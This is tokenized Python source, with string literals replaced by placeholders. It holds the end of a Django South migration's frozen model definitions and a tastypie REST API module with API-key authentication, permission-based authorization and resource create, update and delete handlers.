'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:start>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:status>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:result>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:status>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:status>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:status>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> from tastypie import http <EOL> from tastypie . authentication import ApiKeyAuthentication <EOL> from tastypie . authorization import DjangoAuthorization <EOL> from tastypie . exceptions import ImmediateHttpResponse <EOL> from tastypie . resources import ModelResource <EOL> from django . http import HttpResponse <EOL> from . core . models import ApiKey <EOL> import logging <EOL> logger = logging . getLogger ( "<STR_LIT>" ) <EOL> class MTApiKeyAuthentication ( ApiKeyAuthentication ) : <EOL> """<STR_LIT>""" <EOL> def get_key ( self , user , api_key ) : <EOL> try : <EOL> ApiKey . objects . get ( owner = user , key = api_key , active = True ) <EOL> logger . debug ( "<STR_LIT>" ) <EOL> except Exception as e : <EOL> logger . debug ( "<STR_LIT>" % e ) <EOL> return self . _unauthorized ( ) <EOL> return True <EOL> def is_authenticated ( self , request , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if request . method == "<STR_LIT:GET>" : <EOL> return True <EOL> from . core . auth import User <EOL> username = request . GET . get ( "<STR_LIT:username>" ) or request . POST . get ( "<STR_LIT:username>" ) <EOL> api_key = request . GET . get ( "<STR_LIT>" ) or request . POST . get ( "<STR_LIT>" ) <EOL> if not username or not api_key : <EOL> if not username : <EOL> logger . debug ( "<STR_LIT>" ) <EOL> elif not api_key : <EOL> logger . debug ( "<STR_LIT>" ) <EOL> return self . _unauthorized ( ) <EOL> try : <EOL> user = User . objects . get ( username = username ) <EOL> except ( User . DoesNotExist , User . MultipleObjectsReturned ) : <EOL> logger . debug ( "<STR_LIT>" ) <EOL> return self . _unauthorized ( ) <EOL> request . user = user <EOL> return self . get_key ( user , api_key ) <EOL> class MTAuthorization ( DjangoAuthorization ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def permission ( self ) : <EOL> """<STR_LIT>""" <EOL> klass = self . resource_meta . object_class <EOL> permission = "<STR_LIT>" % ( klass . _meta . app_label , <EOL> klass . _meta . module_name ) <EOL> logger . debug ( "<STR_LIT>" % permission ) <EOL> return permission <EOL> def read_detail ( self , object_list , bundle ) : <EOL> klass = self . base_checks ( bundle . request , bundle . obj . __class__ ) <EOL> if klass and bundle . request . user . has_perm ( self . permission ) : <EOL> return True <EOL> return super ( MTAuthorization , self ) . read_detail ( object_list , bundle ) <EOL> def create_detail ( self , object_list , bundle ) : <EOL> klass = self . base_checks ( bundle . request , bundle . obj . __class__ ) <EOL> if klass and bundle . request . user . has_perm ( self . permission ) : <EOL> return True <EOL> return super ( MTAuthorization , self ) . create_detail ( object_list , bundle ) <EOL> def update_detail ( self , object_list , bundle ) : <EOL> klass = self . base_checks ( bundle . request , bundle . obj . __class__ ) <EOL> if klass and bundle . request . user . has_perm ( self . permission ) : <EOL> return True <EOL> return super ( MTAuthorization , self ) . update_detail ( object_list , bundle ) <EOL> def delete_detail ( self , object_list , bundle ) : <EOL> klass = self . base_checks ( bundle . request , bundle . obj . __class__ ) <EOL> if klass and bundle . request . user . has_perm ( self . permission ) : <EOL> return True <EOL> return super ( MTAuthorization , self ) . delete_detail ( object_list , bundle ) <EOL> class MTResource ( ModelResource ) : <EOL> """<STR_LIT>""" <EOL> class Meta : <EOL> list_allowed_methods = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> detail_allowed_methods = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> authentication = MTApiKeyAuthentication ( ) <EOL> authorization = MTAuthorization ( ) <EOL> always_return_data = True <EOL> ordering = [ '<STR_LIT:id>' ] <EOL> @ property <EOL> def model ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> @ property <EOL> def read_create_fields ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ ] <EOL> def check_read_create ( self , bundle ) : <EOL> """<STR_LIT>""" <EOL> obj = self . get_via_uri ( bundle . request . path , request = bundle . request ) <EOL> for fk in self . read_create_fields : <EOL> if fk not in bundle . data : <EOL> continue <EOL> new_fk_id = self . _id_from_uri ( bundle . data [ fk ] ) <EOL> old_fk_id = str ( getattr ( obj , fk ) . id ) <EOL> if new_fk_id != old_fk_id : <EOL> error_message = str ( <EOL> "<STR_LIT>" % ( fk , self . _meta . resource_name ) + <EOL> "<STR_LIT>" ) <EOL> logger . error ( <EOL> "<STR_LIT:\n>" . join ( [ error_message , "<STR_LIT>" ] ) , <EOL> old_fk_id , new_fk_id ) <EOL> raise ImmediateHttpResponse ( <EOL> response = http . HttpBadRequest ( error_message ) ) <EOL> return bundle <EOL> def obj_create ( self , bundle , request = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> request = request or bundle . request <EOL> try : <EOL> bundle = super ( MTResource , self ) . obj_create ( <EOL> bundle = bundle , request = request , ** kwargs ) <EOL> bundle . obj . created_by = request . user <EOL> bundle . obj . save ( user = request . user ) <EOL> return bundle <EOL> except Exception : <EOL> logger . exception ( "<STR_LIT>" , bundle ) <EOL> raise <EOL> def obj_update ( self , bundle , request = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> bundle = self . check_read_create ( bundle ) <EOL> request = request or bundle . request <EOL> try : <EOL> bundle = super ( MTResource , self ) . obj_update ( <EOL> bundle , ** kwargs ) <EOL> bundle . obj . save ( user = request . user ) <EOL> return bundle <EOL> except Exception : <EOL> logger . exception ( "<STR_LIT>" , bundle ) <EOL> raise <EOL> def obj_delete ( self , bundle , request = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> request = request or bundle . request <EOL> try : <EOL> permanent = request . REQUEST . get ( '<STR_LIT>' , False ) <EOL> obj_id = self . _id_from_uri ( request . path ) <EOL> obj = self . model . objects . get ( id = obj_id ) <EOL> bundle . obj = obj <EOL> self . authorized_delete_detail ( [ obj ] , bundle ) <EOL> obj . delete ( user = request . user , permanent = permanent ) <EOL> except Exception : <EOL> logger . exception ( "<STR_LIT>" , request . path ) <EOL> raise <EOL> def delete_detail ( self , request , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> res = super ( MTResource , self ) . delete_detail ( request , ** kwargs ) <EOL> if ( res . status_code == <NUM_LIT> ) : <EOL> return HttpResponse 